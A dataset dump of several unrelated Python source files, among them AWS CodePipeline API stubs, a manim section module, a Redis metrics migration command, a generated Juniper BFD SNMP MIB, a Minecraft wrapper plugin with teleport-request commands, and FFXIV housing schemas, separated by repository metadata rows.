        * ``summary`` (string) -- summary of the current status of the
          actions.
        * ``externalExecutionId`` (string) -- system-generated unique ID
          identifying this job worker in external systems, such as AWS
          CodeDeploy.
        * ``percentComplete`` (integer) -- percentage of the action's work
          completed, on a scale of zero to one hundred.
    """
    pass
def put_third_party_job_failure_result(jobId=None, clientToken=None, failureDetails=None):
    """Report a third-party job failure back to the pipeline.

    Only used for partner actions.

    See also: AWS API Documentation.

    :type jobId: string
    :param jobId: [REQUIRED] The ID of the failed job; the same ID returned
        from PollForThirdPartyJobs.
    :type clientToken: string
    :param clientToken: [REQUIRED] The clientToken portion of the
        clientId/clientToken pair used to verify that the caller is allowed
        access to the job and its details.
    :type failureDetails: dict
    :param failureDetails: [REQUIRED] Details about the failure:

        * ``type`` (string) -- [REQUIRED] the failure type.
        * ``message`` (string) -- [REQUIRED] the failure message.
        * ``externalExecutionId`` (string) -- external ID of the failed
          action run.
    """
    pass
def put_third_party_job_success_result(jobId=None, clientToken=None, currentRevision=None, continuationToken=None, executionDetails=None):
    """Report the success of a third party job to the pipeline (partner actions only).

    :type jobId: string
    :param jobId: [REQUIRED] The ID of the job that successfully completed, as
        returned by PollForThirdPartyJobs.
    :type clientToken: string
    :param clientToken: [REQUIRED] The clientToken portion of the clientId/clientToken
        pair used to verify that the caller may access the job and its details.
    :type currentRevision: dict
    :param currentRevision: Information about the current revision: ``revision`` and
        ``changeIdentifier`` are required; ``created`` (datetime) and
        ``revisionSummary`` are optional.
    :type continuationToken: string
    :param continuationToken: Worker-generated token (e.g. an AWS CodeDeploy
        deployment ID) identifying a partner action still in progress; omit it once
        the action is complete.
    :type executionDetails: dict
    :param executionDetails: Details of the work performed: optional ``summary``,
        ``externalExecutionId`` and ``percentComplete`` (integer, 0-100).
    """
    pass
def retry_stage_execution(pipelineName=None, stageName=None, pipelineExecutionId=None, retryMode=None):
    """Resume a pipeline execution by retrying the last failed actions in a stage.

    :type pipelineName: string
    :param pipelineName: [REQUIRED] The pipeline that contains the failed stage.
    :type stageName: string
    :param stageName: [REQUIRED] The name of the failed stage to be retried.
    :type pipelineExecutionId: string
    :param pipelineExecutionId: [REQUIRED] The execution ID of the failed stage;
        retrieve the current one with GetPipelineState.
    :type retryMode: string
    :param retryMode: [REQUIRED] The scope of the retry attempt. Currently the only
        supported value is 'FAILED_ACTIONS'.
    :rtype: dict
    :return: ``{'pipelineExecutionId': 'string'}``
    """
    pass
def start_pipeline_execution(name=None):
    """Start the named pipeline, processing the latest commit of its source location.

    :type name: string
    :param name: [REQUIRED] The name of the pipeline to start.
    :rtype: dict
    :return: ``{'pipelineExecutionId': 'string'}``
    """
    pass
def update_pipeline(pipeline=None):
    """Update a pipeline's structure; the pipeline's version number increases by 1.

    Provide the full pipeline declaration (typically from a JSON file) in
    conjunction with UpdatePipeline.

    :type pipeline: dict
    :param pipeline: [REQUIRED] The full pipeline declaration. Required keys:
        ``name``, ``roleArn``, ``artifactStore`` (with required ``type`` e.g. 'S3'
        and ``location``, plus optional ``encryptionKey`` with required ``id`` and
        ``type`` — 'KMS' when creating or updating) and ``stages``. Each stage
        requires ``name`` and ``actions`` (``blockers`` is reserved for future
        use); each action requires ``name`` and ``actionTypeId`` (``category``:
        one of Source/Build/Deploy/Test/Invoke/Approval, ``owner``:
        AWS/ThirdParty/Custom, ``provider`` and ``version``), with optional
        ``runOrder``, ``configuration``, ``outputArtifacts``, ``inputArtifacts``
        (artifact names must be unique within a pipeline) and per-action
        ``roleArn``. The integer ``version`` is incremented automatically.
    :rtype: dict
    :return: ``{'pipeline': {...}}`` — the updated pipeline declaration.
    """
    pass
| 39.642202 | 430 | 0.538475 |
795c80061120a94b89c5851eaf6605833294608f | 81 | py | Python | tests/__init__.py | UofU-Cryosphere/weather_forecast_retrieval | b06fe2e09b49ace9eba55bf424c1b2d1e358858c | [
"CC0-1.0"
] | 6 | 2017-12-20T22:42:24.000Z | 2021-08-07T03:32:27.000Z | tests/__init__.py | UofU-Cryosphere/weather_forecast_retrieval | b06fe2e09b49ace9eba55bf424c1b2d1e358858c | [
"CC0-1.0"
] | 26 | 2019-03-07T17:47:13.000Z | 2021-06-25T15:43:27.000Z | tests/__init__.py | UofU-Cryosphere/weather_forecast_retrieval | b06fe2e09b49ace9eba55bf424c1b2d1e358858c | [
"CC0-1.0"
] | 3 | 2019-03-08T07:28:59.000Z | 2021-02-12T21:59:12.000Z | # -*- coding: utf-8 -*-
"""Unit test package for weather_forecast_retrieval."""
| 20.25 | 55 | 0.666667 |
795c803ae35193ebd2ce7bd865cbe5f65cc447ce | 3,644 | py | Python | manim/scene/section.py | dianechae/manim | 269e5c22cb02de108579eccee2b82583eb71e3dc | [
"MIT"
] | 1 | 2021-10-17T15:43:51.000Z | 2021-10-17T15:43:51.000Z | manim/scene/section.py | dianechae/manim | 269e5c22cb02de108579eccee2b82583eb71e3dc | [
"MIT"
] | null | null | null | manim/scene/section.py | dianechae/manim | 269e5c22cb02de108579eccee2b82583eb71e3dc | [
"MIT"
] | null | null | null | """building blocks of segmented video API"""
from __future__ import annotations
import os
from enum import Enum
from typing import Any, Dict, List, Optional
from manim import get_video_metadata
class DefaultSectionType(str, Enum):
    """Built-in section type markers usable by third party applications.

    A presentation system, for instance, can key behaviour off these values
    (e.g. building loops). Extend the same ``str``-``Enum`` pattern for more
    types::

        class PresentationSectionType(str, Enum):
            NORMAL = "presentation.normal"          # wait for the user
            SKIP = "presentation.skip"              # continue immediately
            LOOP = "presentation.loop"              # restart until continued
            COMPLETE_LOOP = "presentation.complete_loop"  # finish loop first
    """

    NORMAL = "default.normal"
class Section:
    """A named segment of a :class:`.Scene`, grouping several animations.

    Refer to :doc:`the documentation</tutorials/a_deeper_look>` for more info.

    Attributes
    ----------
    type
        Free-form classifier that third party applications can use.
    video
        Video path relative to the sections directory, or ``None`` when the
        section is not saved.
    name
        Human readable, non-unique section name.
    skip_animations
        When ``True``, rendering of this section's animations is skipped.
    partial_movie_files
        Animations belonging to this section.

    See Also
    --------
    :class:`.DefaultSectionType`
    :meth:`.CairoRenderer.update_skipping_status`
    :meth:`.OpenGLRenderer.update_skipping_status`
    """

    def __init__(self, type: str, video: str | None, name: str, skip_animations: bool):
        self.type = type
        # ``None`` means "do not save" while keeping the section itself alive.
        self.video: str | None = video
        self.name = name
        self.skip_animations = skip_animations
        self.partial_movie_files: list[str | None] = []

    def is_empty(self) -> bool:
        """Whether this section holds no animations (``None`` entries count too)."""
        return not self.partial_movie_files

    def get_clean_partial_movie_files(self) -> list[str]:
        """All partial movie files with ``None`` placeholders filtered out."""
        return [movie for movie in self.partial_movie_files if movie is not None]

    def get_dict(self, sections_dir: str) -> dict[str, Any]:
        """Dictionary representation of this section plus its video's metadata.

        Used by every section to build the sections index file; the output
        video must already exist inside ``sections_dir``. Raises
        :class:`ValueError` when no video path is assigned.
        """
        if self.video is None:
            raise ValueError(
                f"Section '{self.name}' cannot be exported as dict, it does not have a video path assigned to it"
            )
        video_path = os.path.join(sections_dir, self.video)
        return {
            "name": self.name,
            "type": self.type,
            "video": self.video,
            **get_video_metadata(video_path),
        }

    def __repr__(self):
        return f"<Section '{self.name}' stored in '{self.video}'>"
| 35.378641 | 113 | 0.642975 |
795c824e7ec1d604bd9ae1e219321a9ae8dc8c85 | 1,835 | py | Python | redis_metrics/management/commands/reset_weekly_metrics.py | sporteasy/django-redis-metrics | 8f3d55651c3e2c1dff1aa1d96d04ddc7e9e5680e | [
"MIT"
] | 1 | 2019-02-10T19:33:41.000Z | 2019-02-10T19:33:41.000Z | redis_metrics/management/commands/reset_weekly_metrics.py | sporteasy/django-redis-metrics | 8f3d55651c3e2c1dff1aa1d96d04ddc7e9e5680e | [
"MIT"
] | null | null | null | redis_metrics/management/commands/reset_weekly_metrics.py | sporteasy/django-redis-metrics | 8f3d55651c3e2c1dff1aa1d96d04ddc7e9e5680e | [
"MIT"
] | null | null | null | import re
from datetime import date
from django.core.management.base import BaseCommand, CommandError
from redis_metrics.models import R
class Command(BaseCommand):
    """
    Updates the weekly metrics so they use the new key format. For
    more information, see Issue #7: http://bit.ly/YEjtF9

    Essentially, weekly-aggregated metrics had a key of the form::

        m:<slug>:w:<nn>

    Where ``nn`` was the week number in the range: [00-52). They now take the
    form::

        m:<slug>:w:<yyyy-nn>

    Where ``yyyy`` is a 4-digit year, and ``nn`` is the week number.
    """
    args = '[year]'
    help = "Updates weekly metrics so they match the new key format"

    def handle(self, *args, **options):
        """Rewrite every old-format weekly key for the given (or current) year."""
        if len(args) == 0:
            # Use the current year
            year = date.today().year
        elif len(args) == 1:
            year = int(args[0])
        else:
            raise CommandError("Invalid arguments. Provide a 4-digit year.")

        r = R()
        # Retrieve all the metric keys of the form: "m:<slug>:w:<nn>".
        # BUG FIX: this used a lazy filter() object, which the for-loop below
        # exhausted — the final srem() then received no members at all.
        # Materialize the matches once so they can be iterated *and* removed.
        weekly_keys = [
            key for key in r.r.smembers(r._metric_slugs_key)
            if re.match(r'^m:.+:w:\d\d', key) is not None
        ]
        for old_key in weekly_keys:
            # Match   -> m:<slug>:w:<nn>
            # Replace -> m:<slug>:w:<yyyy-nn>
            parts = old_key.split(":")
            parts[-1] = "{0}-{1}".format(year, parts[-1])
            new_key = ":".join(parts)
            # Copy old metric value into new metric
            r.r.set(new_key, r.r.get(old_key))
            # Track the new key
            r.r.sadd(r._metric_slugs_key, new_key)
            # Delete the old metric
            r.r.delete(old_key)
        # Remove the old weekly keys from the slug set. srem() requires at
        # least one member, so skip the call when nothing matched.
        if weekly_keys:
            r.r.srem(r._metric_slugs_key, *weekly_keys)
| 29.126984 | 77 | 0.565668 |
795c842caee13836bb4b2a7c3e6e94488f62b031 | 4,957 | py | Python | pysnmp/JUNIPER-BFD-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/JUNIPER-BFD-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/JUNIPER-BFD-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module JUNIPER-BFD-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/JUNIPER-BFD-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:47:55 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# NOTE(review): machine-generated by pysmi — do not hand-edit, regenerate from
# the ASN.1 source instead. `mibBuilder` is presumably injected into this
# module's namespace by the pysnmp MIB loader at import time — confirm before
# importing this file directly.
# --- Base types and symbols imported from prerequisite MIB modules ---
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection")
bfdSessIndex, = mibBuilder.importSymbols("BFD-STD-MIB", "bfdSessIndex")
jnxBfdMibRoot, = mibBuilder.importSymbols("JUNIPER-SMI", "jnxBfdMibRoot")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter32, NotificationType, iso, ObjectIdentity, TimeTicks, Gauge32, Counter64, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Integer32, IpAddress, Unsigned32, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "NotificationType", "iso", "ObjectIdentity", "TimeTicks", "Gauge32", "Counter64", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "Integer32", "IpAddress", "Unsigned32", "Bits")
TimeStamp, TextualConvention, DisplayString, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "TimeStamp", "TextualConvention", "DisplayString", "TruthValue")
# --- Module identity and revision history ---
jnxBfdMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1))
jnxBfdMib.setRevisions(('2006-10-12 12:00',))
if mibBuilder.loadTexts: jnxBfdMib.setLastUpdated('200610121200Z')
if mibBuilder.loadTexts: jnxBfdMib.setOrganization('IETF')
# --- Identifier layout under the module root: .0 notifications, .1 objects, .2 notify-only objects ---
jnxBfdNotification = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 0))
jnxBfdObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1))
jnxBfdNotifyObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 2))
# --- Per-session table, rows indexed by bfdSessIndex from BFD-STD-MIB ---
jnxBfdSessTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1), )
if mibBuilder.loadTexts: jnxBfdSessTable.setStatus('current')
jnxBfdSessEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1), ).setIndexNames((0, "BFD-STD-MIB", "bfdSessIndex"))
if mibBuilder.loadTexts: jnxBfdSessEntry.setStatus('current')
# Read-only columns: threshold/current TX interval and detection time (microseconds), interface name.
jnxBfdSessThreshTxInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1, 1), Unsigned32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxBfdSessThreshTxInterval.setStatus('current')
jnxBfdSessCurrTxInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1, 2), Unsigned32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxBfdSessCurrTxInterval.setStatus('current')
jnxBfdSessThreshDectTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1, 3), Unsigned32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxBfdSessThreshDectTime.setStatus('current')
jnxBfdSessCurrDectTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1, 4), Unsigned32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxBfdSessCurrDectTime.setStatus('current')
jnxBfdSessIntfName = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxBfdSessIntfName.setStatus('current')
# --- Scalar carried only inside notifications (accessible-for-notify) ---
jnxBfdSessifName = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 2, 1), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxBfdSessifName.setStatus('current')
# --- Notifications pairing each threshold object with its current-value object ---
jnxBfdSessTxIntervalHigh = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 0, 1)).setObjects(("JUNIPER-BFD-MIB", "jnxBfdSessThreshTxInterval"), ("JUNIPER-BFD-MIB", "jnxBfdSessCurrTxInterval"))
if mibBuilder.loadTexts: jnxBfdSessTxIntervalHigh.setStatus('current')
jnxBfdSessDetectionTimeHigh = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 0, 2)).setObjects(("JUNIPER-BFD-MIB", "jnxBfdSessThreshDectTime"), ("JUNIPER-BFD-MIB", "jnxBfdSessCurrDectTime"))
if mibBuilder.loadTexts: jnxBfdSessDetectionTimeHigh.setStatus('current')
# --- Export this module's symbols so other MIB modules can import them ---
mibBuilder.exportSymbols("JUNIPER-BFD-MIB", jnxBfdNotifyObjects=jnxBfdNotifyObjects, jnxBfdMib=jnxBfdMib, PYSNMP_MODULE_ID=jnxBfdMib, jnxBfdSessThreshDectTime=jnxBfdSessThreshDectTime, jnxBfdSessIntfName=jnxBfdSessIntfName, jnxBfdSessTxIntervalHigh=jnxBfdSessTxIntervalHigh, jnxBfdSessDetectionTimeHigh=jnxBfdSessDetectionTimeHigh, jnxBfdObjects=jnxBfdObjects, jnxBfdSessTable=jnxBfdSessTable, jnxBfdSessEntry=jnxBfdSessEntry, jnxBfdNotification=jnxBfdNotification, jnxBfdSessCurrTxInterval=jnxBfdSessCurrTxInterval, jnxBfdSessCurrDectTime=jnxBfdSessCurrDectTime, jnxBfdSessifName=jnxBfdSessifName, jnxBfdSessThreshTxInterval=jnxBfdSessThreshTxInterval)
| 112.659091 | 653 | 0.773452 |
795c855d60b77e20c876cacec9a8091a695ddc63 | 258 | py | Python | plugins/giveaways/requirements/__init__.py | Friskytool/command-handler | 2c0c7eecc8afe7898650dfc69d1c8816448c2480 | [
"MIT"
] | null | null | null | plugins/giveaways/requirements/__init__.py | Friskytool/command-handler | 2c0c7eecc8afe7898650dfc69d1c8816448c2480 | [
"MIT"
] | 4 | 2021-12-10T06:18:12.000Z | 2022-03-24T14:43:57.000Z | plugins/giveaways/requirements/__init__.py | Friskytool/command-handler | 2c0c7eecc8afe7898650dfc69d1c8816448c2480 | [
"MIT"
] | null | null | null | from .lottery import Lottery
from .roles import Role, Bypass, Blacklist
from .amari import Amari
from .mee6 import Mee6
from .boost import Boost
def setup(bot):
    """Register every giveaway requirement class with the bot."""
    requirements = (Role, Bypass, Blacklist, Amari, Mee6, Boost, Lottery)
    for requirement in requirements:
        requirement.inject(bot)
| 23.454545 | 70 | 0.724806 |
795c8565478a287468f8fe19c1c1ccbf9c40fc16 | 11,835 | py | Python | __init__.py | Chainmail-Project/ChainmailEssentials | 4df9725770e72856f39e260f810edac3f179e03d | [
"MIT"
] | null | null | null | __init__.py | Chainmail-Project/ChainmailEssentials | 4df9725770e72856f39e260f810edac3f179e03d | [
"MIT"
] | null | null | null | __init__.py | Chainmail-Project/ChainmailEssentials | 4df9725770e72856f39e260f810edac3f179e03d | [
"MIT"
] | null | null | null | import builtins
import threading
import time
import traceback
from typing import TypeVar, List, Optional, Match
from Chainmail import Wrapper
from Chainmail.Events import CommandSentEvent, PlayerConnectedEvent, Events
from Chainmail.MessageBuilder import MessageBuilder, Colours
from Chainmail.Player import Player
from Chainmail.Plugin import ChainmailPlugin
from plugins.ChainmailRCON import ChainmailRCON, RCONClientHandler
# NOTE(review): module-level TypeVar that appears unused in this file (and
# shadows nothing) — confirm no external consumer imports it before removing.
t = TypeVar("t")
class PendingTPA(object):
    """A pending teleport request (TPA) from one player to another.

    Both players are notified on creation; the request counts as expired once
    it has been responded to or is older than 60 seconds.
    """

    def __init__(self, creator: Player, recipient: Player):
        self.created_at = time.time()
        self.creator: Player = creator
        self.recipient: Player = recipient
        self.responded = False
        self.notify_creation()

    def notify_creation(self):
        """Tell the recipient how to respond and confirm dispatch to the creator."""
        to_recipient = MessageBuilder()
        to_recipient.add_field("You have been sent a teleport request by ", Colours.gold)
        to_recipient.add_field(f"{self.creator.username}.\n", Colours.blue)
        to_recipient.add_field("Use ", Colours.gold)
        to_recipient.add_field("!tpaccept ", Colours.blue)
        to_recipient.add_field("to accept the request, or ", Colours.gold)
        to_recipient.add_field("!tpdeny ", Colours.blue)
        to_recipient.add_field("to decline it.", Colours.gold)
        self.recipient.send_message(to_recipient)

        to_creator = MessageBuilder()
        to_creator.add_field("Your request to ", Colours.gold)
        to_creator.add_field(f"{self.recipient.username} ", Colours.blue)
        to_creator.add_field("has been sent.", Colours.gold)
        self.creator.send_message(to_creator)

    def do_teleport(self):
        """Notify both players, then move the creator to the recipient."""
        to_creator = MessageBuilder()
        to_creator.add_field("Teleporting you to ", Colours.gold)
        to_creator.add_field(f"{self.recipient.username}.", Colours.blue)
        self.creator.send_message(to_creator)

        to_recipient = MessageBuilder()
        to_recipient.add_field("You are being teleported to by ", Colours.gold)
        to_recipient.add_field(f"{self.creator.username}.", Colours.blue)
        self.recipient.send_message(to_recipient)

        self.creator.teleport_to(self.recipient)

    def notify_expired(self):
        """Inform both players that the request timed out (no-op if answered)."""
        if self.responded:
            return
        to_creator = MessageBuilder()
        to_creator.add_field("Your TPA to ", Colours.gold)
        to_creator.add_field(f"{self.recipient.username} ", Colours.blue)
        to_creator.add_field("has expired.", Colours.gold)
        self.creator.send_message(to_creator)

        to_recipient = MessageBuilder()
        to_recipient.add_field("Your TPA from ", Colours.gold)
        to_recipient.add_field(f"{self.creator.username} ", Colours.blue)
        to_recipient.add_field("has expired.", Colours.gold)
        self.recipient.send_message(to_recipient)

    def notify_denied(self):
        """Tell the creator the request was declined and confirm to the recipient."""
        to_creator = MessageBuilder()
        to_creator.add_field(f"{self.recipient.username} ", Colours.blue)
        to_creator.add_field("has declined your teleport request.", Colours.gold)
        self.creator.send_message(to_creator)

        to_recipient = MessageBuilder()
        to_recipient.add_field("Request denied.", Colours.red)
        self.recipient.send_message(to_recipient)

    @property
    def expired(self) -> bool:
        """True once the request was answered or has aged past 60 seconds."""
        if self.responded:
            return True
        return time.time() - self.created_at >= 60
class ChainmailEssentials(ChainmailPlugin):
def __init__(self, manifest: dict, wrapper: "Wrapper.Wrapper") -> None:
super().__init__(manifest, wrapper)
self.rcon = getattr(builtins, "RCON") # type: ChainmailRCON
self.needs_update = self.new_version_available
self.pending_tpas = [] # type: List[PendingTPA]
self.eval_usage_message = MessageBuilder()
self.eval_usage_message.add_field("Usage: ", colour=Colours.red, bold=True)
self.eval_usage_message.add_field("!exec <code>", colour=Colours.gold)
self.update_message = MessageBuilder()
self.update_message.add_field("A new version of ", Colours.gold)
self.update_message.add_field("Chainmail Essentials ", Colours.blue)
self.update_message.add_field("is available.", Colours.gold)
self.eval = self.wrapper.CommandRegistry.register_command("!eval", "^!eval (.+)$", "Evaluates Python expressions.", self.command_eval, True)
self.eval_usage = self.wrapper.CommandRegistry.register_command("!eval", "^!eval$", "Displays the usage message.", self.command_eval_usage, True)
self.commands = self.wrapper.CommandRegistry.register_command("!commands", "^!commands$", "Lists commands accessible to a user.", self.command_commands)
self.plugins = self.wrapper.CommandRegistry.register_command("!plugins", "^!plugins$", "Lists all loaded plugins.", self.command_plugins)
self.reload = self.wrapper.CommandRegistry.register_command("!reload", "^!reload$", "Reloads all plugins.", self.command_reload, True)
self.tpa = self.wrapper.CommandRegistry.register_command("!tpa", "^!tpa ([\\w\\d_]+)$", "Requests to teleport to another user.", self.command_tpa)
self.tpaccept = self.wrapper.CommandRegistry.register_command("!tpaccept", "^!tpaccept$", "Accepts a teleport request.", self.command_tpaccept)
self.tpdeny = self.wrapper.CommandRegistry.register_command("!tpdeny", "^!tpdeny$", "Denies a teleport request.", self.command_tpdeny)
self.info = self.wrapper.CommandRegistry.register_command("!info", "^!info$", "Gets various info about the server.", self.command_info, True)
self.rcon.register_command("/commands", "^/commands$", "Lists the commands you have access to.", self.rconcommand_commands)
self.wrapper.EventManager.register_handler(Events.PLAYER_CONNECTED, self.handle_connection)
def remove_expired_tpas_thread(self):
while self.wrapper.wrapper_running and self.enabled:
for tpa in self.pending_tpas:
if tpa.expired:
tpa.notify_expired()
self.pending_tpas.remove(tpa)
time.sleep(5)
def get_tpa(self, creator: Player=None, recipient: Player=None) -> Optional[PendingTPA]:
"""
Gets a pending tpa for a specified creator or recipient
:param creator: The creator of the tpa
:param recipient: The recipient of the tpa
:return: The tpa
"""
if creator is not None:
for tpa in self.pending_tpas:
if tpa.creator == creator:
return tpa
if recipient is not None:
for tpa in self.pending_tpas:
if tpa.recipient == recipient:
return tpa
return None
# noinspection PyMethodMayBeStatic
def command_eval(self, event: CommandSentEvent):
code = event.args[0]
# noinspection PyBroadException
try:
result = str(eval(code))
error = False
except:
result = traceback.format_exc(1)
error = True
builder = MessageBuilder()
colour = Colours.green if not error else Colours.red
builder.add_field("Result: ", colour=Colours.gold)
builder.add_field(result, colour=colour)
event.player.send_message(builder)
def command_eval_usage(self, event: CommandSentEvent):
event.player.send_message(self.eval_usage_message)
def command_commands(self, event: CommandSentEvent):
commands = self.wrapper.CommandRegistry.get_accessible_commands(event.player)
builder = MessageBuilder()
seen_commands = []
for command in commands:
if command.name not in seen_commands:
seen_commands.append(command.name)
builder.add_field(f"{command.name}: ", Colours.red)
suffix = "\n" if command != commands[-1] and command.name != commands[-1].name else ""
builder.add_field(f"{command.description}{suffix}", Colours.gold)
event.player.send_message(builder)
def rconcommand_commands(self, matches: List[Match[str]], client: RCONClientHandler):
components = []
seen = []
for command in self.rcon.commands:
if command["name"] not in seen and (client.authed or not command["requires_auth"]):
seen.append(command["name"])
components.append(f"{command['name']}: {command['description']}")
client.writeline("\n".join(components))
def command_plugins(self, event: CommandSentEvent):
plugins = self.wrapper.PluginManager.get_all_plugins()
builder = MessageBuilder()
for plugin in plugins:
if self.wrapper.PluginManager.get_plugin_loaded(plugin["manifest"]["name"]):
builder.add_field(f"{plugin['manifest']['name']}\n", Colours.blue)
builder.add_field(" Developer: ", Colours.red)
builder.add_field(f"{plugin['manifest']['developer']}\n", Colours.blue)
suffix = "\n" if plugin != plugins[-1] else ""
builder.add_field(" Version: ", Colours.red)
builder.add_field(f"{plugin['manifest']['version']}{suffix}", Colours.blue)
event.player.send_message(builder)
def command_reload(self, event: CommandSentEvent):
builder = MessageBuilder()
builder.add_field("Reloading all plugins...", Colours.blue)
event.player.send_message(builder)
self.wrapper.reload()
builder = MessageBuilder()
builder.add_field("Plugins reloaded.", Colours.green)
event.player.send_message(builder)
def command_tpa(self, event: CommandSentEvent):
recipient = self.wrapper.PlayerManager.get_player(event.args[0])
if recipient is None:
builder = MessageBuilder()
builder.add_field("A player with that username was not found.", Colours.red)
event.player.send_message(builder)
return
if self.get_tpa(creator=event.player) is not None:
builder = MessageBuilder()
builder.add_field("You already have an active outgoing TPA request.", Colours.red)
event.player.send_message(builder)
return
if self.get_tpa(recipient=recipient) is not None:
builder = MessageBuilder()
builder.add_field("The other player already has a pending TPA request.", Colours.red)
event.player.send_message(builder)
return
self.pending_tpas.append(PendingTPA(event.player, recipient))
def command_tpaccept(self, event: CommandSentEvent):
tpa = self.get_tpa(recipient=event.player)
if tpa is None:
builder = MessageBuilder()
builder.add_field("You do not have a pending TPA.", Colours.red)
event.player.send_message(builder)
return
tpa.responded = True
tpa.do_teleport()
def command_tpdeny(self, event: CommandSentEvent):
tpa = self.get_tpa(recipient=event.player)
if tpa is None:
builder = MessageBuilder()
builder.add_field("You do not have a pending TPA.", Colours.red)
event.player.send_message(builder)
return
tpa.responded = True
tpa.notify_denied()
def command_info(self, event: CommandSentEvent):
builder = MessageBuilder()
builder.add_field("Server version: ", Colours.gold)
builder.add_field(f"{self.wrapper.version}\n", Colours.blue)
builder.add_field("OPs: ", Colours.gold)
builder.add_field(f"{len(self.wrapper.ops)}", Colours.blue)
event.player.send_message(builder)
def handle_connection(self, event: PlayerConnectedEvent):
if event.player.is_op and self.needs_update:
event.player.send_message(self.update_message)
    def enable(self) -> None:
        """Enable the plugin and start the background TPA-expiry worker."""
        super().enable()
        # Non-daemon thread: remove_expired_tpas_thread is presumably expected
        # to exit on its own when the wrapper shuts down -- TODO confirm.
        threading.Thread(target=self.remove_expired_tpas_thread).start()
| 44.829545 | 160 | 0.657203 |
795c857a9bb8183e2032d8e2c033749a7c05e114 | 1,611 | py | Python | common/schemas/ffxiv.py | zhudotexe/FFXIV_PaissaDB | 8ce7edbc0e2b383a201b8789a09bd263eb0713c7 | [
"MIT"
] | 2 | 2021-09-07T00:44:05.000Z | 2022-03-26T17:14:46.000Z | common/schemas/ffxiv.py | zhudotexe/FFXIV_PaissaDB | 8ce7edbc0e2b383a201b8789a09bd263eb0713c7 | [
"MIT"
] | null | null | null | common/schemas/ffxiv.py | zhudotexe/FFXIV_PaissaDB | 8ce7edbc0e2b383a201b8789a09bd263eb0713c7 | [
"MIT"
] | 1 | 2021-09-15T17:45:46.000Z | 2021-09-15T17:45:46.000Z | """
Schemas defined by FFXIV game code.
See https://github.com/zhudotexe/FFXIV_PaissaHouse/tree/main/Structures
"""
import enum
from pydantic import BaseModel, conlist, constr
from common import models
# ---- substructures ----
class HousingFlags(enum.IntFlag):
    """Bit flags describing the state of a single housing plot.

    Values mirror the packed InfoFlags byte carried by HouseInfoEntry.
    """
    PlotOwned = 0x01
    VisitorsAllowed = 0x02
    HasSearchComment = 0x04
    HouseBuilt = 0x08
    OwnedByFC = 0x10
class LandIdent(BaseModel):
    """Identifies one housing ward: world, territory, ward number and land id."""
    # Field names mirror the game's LandIdent struct (see module docstring).
    LandId: int
    WardNumber: int
    TerritoryTypeId: int
    WorldId: int
class HouseInfoEntry(BaseModel):
    """Per-plot information as reported in a housing ward snapshot."""
    HousePrice: int
    InfoFlags: HousingFlags  # packed state bits; see HousingFlags
    HouseAppeals: conlist(int, min_items=3, max_items=3)  # exactly 3 appeal/tag ids
    EstateOwnerName: constr(max_length=32)  # empty/absent semantics depend on InfoFlags -- TODO confirm
# ---- packets ----
class BaseFFXIVPacket(BaseModel):
    """Common envelope for FFXIV packets; parsing yields a concrete subclass.

    Validation is replaced wholesale by ``return_effect``, which dispatches on
    ``event_type`` (via EVENT_TYPES) and returns an instance of the matching
    subclass instead of the base class.
    """
    event_type: models.EventType
